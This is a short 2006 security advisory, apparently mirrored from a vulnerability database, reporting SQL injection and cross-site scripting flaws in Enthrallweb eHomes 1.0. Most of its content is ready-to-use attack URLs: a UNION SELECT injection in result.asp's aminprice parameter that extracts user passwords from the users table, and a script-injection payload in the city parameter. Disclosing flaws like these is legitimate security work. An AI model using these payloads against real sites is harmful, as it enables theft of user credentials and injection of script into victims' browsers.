Lucene search
SecurityvulnsSECURITYVULNS:DOC:15491HistoryDec 25, 2006 - 12:00 a.m.
Title : Enthrallweb eHomes 1.0 Multiple (SQL/XSS) Vulnerabilities
2006-12-2500:00:00
vulners.com
17
Title : Enthrallweb eHomes 1.0 Multiple (SQL/XSS) Vulnerabilities
Author : ajann
Contact : :(
S.Page : http://www.enthrallweb.us
$$ : 179.40 USD
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//result.asp?city=&State=&amaxprice=10000000&abedrooms=&cat=&aminprice=[SQL]
Example:
//result.asp?city=&State=&amaxprice=10000000&abedrooms=&cat=&aminprice=0%20union%20select%20U_Password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
[[/SQL]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//result.asp?city=[XSS]
Example:
//result.asp?city=%22%3E%3Cscript%3Ealert%28%27x%27%29%3B%3C%2Fscript%3E+
[[/XSS]]
"""""""""""""""""""""